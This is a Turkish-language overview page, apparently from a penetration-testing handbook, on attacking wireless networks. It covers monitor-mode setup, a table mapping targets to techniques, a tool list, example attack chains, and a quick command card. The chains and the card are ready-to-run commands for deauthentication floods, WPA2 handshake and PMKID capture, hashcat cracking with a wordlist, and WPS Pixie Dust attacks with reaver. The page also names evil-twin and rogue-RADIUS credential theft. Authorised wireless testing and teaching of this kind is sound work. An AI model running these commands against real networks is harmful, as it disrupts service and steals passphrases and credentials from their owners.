WiFi
Kablosuz ağ testi; radyo katmanının doğası gereği fiziksel erişim (veya yeterli sinyal menzili) gerektiren ama kablolu ağdan farklı bir saldırı yüzeyi sunar. Bu bölüm WPA2 handshake/PMKID kırma, WPS zayıflıkları, evil twin, WEP ve WPA-Enterprise saldırılarını Türkçe olarak ele alır.
Ön koşul — donanım ve monitor mode
Section titled “Ön koşul — donanım ve monitor mode”Monitor mode + paket enjeksiyonu destekleyen bir adaptör gerekir (ör. birçok Atheros/Ralink/Realtek çipli USB kart; macOS yerleşik kartları genelde yetersiz).
iw devsudo airmon-ng check killsudo airmon-ng start wlan0 # → wlan0moniw dev # type monitorsudo aireplay-ng -9 wlan0mon # injection testisudo airmon-ng stop wlan0monsudo systemctl start NetworkManagerMetodoloji
Section titled “Metodoloji”-
Keşif — AP’ler, kanallar, istemciler, ENC/AUTH, WPS, probe’lar.
-
Hedef seçimi — WEP / WPS / zayıf PSK / Enterprise / açık ağ önceliği.
-
Malzeme toplama — handshake, PMKID, WPS PIN, rogue RADIUS hash, portal creds.
-
Kırma / kimlik — hashcat 22000/5500, Pixie, wordlist+rules.
-
Erişim & sonrası — ağa katılım → Network / AD .
Hangi teknik ne zaman
Section titled “Hangi teknik ne zaman”| Hedef | İlk tercih | Alternatif |
|---|---|---|
| WPA2-PSK, istemci var | Handshake + deauth | PMKID |
| WPA2-PSK, istemci yok | PMKID | Bekle / evil twin |
| WPS Enabled, unlocked | Pixie Dust | PIN brute |
| Enterprise (PEAP/MSCHAPv2) | Rogue RADIUS + eaphammer | Captive hibrit |
| Açık / misafir | Evil twin / sniff | KARMA |
| WEP | ARP replay + aircrack | Fragmentation |
| WPA3-SAE | Klasik PSK kırma yok | Başka vektör / kapsam dışı not |
Araç çantası
Section titled “Araç çantası”aircrack-ng suite → airmon, airodump, aireplay, aircrackhcxdumptool/hcxtools → PMKID + EAPOL → hashcat 22000reaver / bully / OneShot → WPSeaphammer / hostapd-wpe → Enterprise roguewifiphisher / hostapd-mana → evil twin / KARMAhashcat / john → offline kırmamdk4 → deauth / DoS çeşitleriBölümler
Section titled “Bölümler”- Keşif & Monitor Mode — monitor mode, airodump, sınıflandırma
- Deauthentication Saldırıları — handshake ve evil twin tetikleyici
- WPA2-PSK Handshake Kırma — 4-way + hashcat 22000
- PMKID Saldırısı (clientless) — istemcisiz toplama
- WPS Saldırıları — Pixie Dust ve PIN brute
- Evil Twin & Rogue AP — captive portal, KARMA/MANA
- WPA-Enterprise Saldırıları — MSCHAPv2 / rogue RADIUS
- WEP Kırma — IV / ARP replay
Zincir örnekleri
Section titled “Zincir örnekleri”airodump keşif → WPS unlocked → reaver -K 1 → PSK → iç ağ nmap / SMBhcxdumptool PMKID → hashcat 22000 → PSK → hostapd aynı PSK twin → MITMAUTH=MGT → eaphammer --creds → hashcat -m 5500 → domain password sprayENC=WEP → aireplay -3 → aircrack-ng → key → IoT segmentHızlı komut kartı
Section titled “Hızlı komut kartı”sudo airmon-ng check kill && sudo airmon-ng start wlan0sudo airodump-ng --band abg wlan0monsudo wash -i wlan0monsudo airodump-ng -c CH --bssid BSSID -w cap wlan0monsudo aireplay-ng --deauth 5 -a BSSID -c CLIENT wlan0monhcxpcapngtool -o hash.22000 cap-01.caphashcat -m 22000 hash.22000 rockyou.txtsudo hcxdumptool -i wlan0mon -w pmkid.pcapng --enable_status=15sudo reaver -i wlan0mon -b BSSID -c CH -K 1 -vv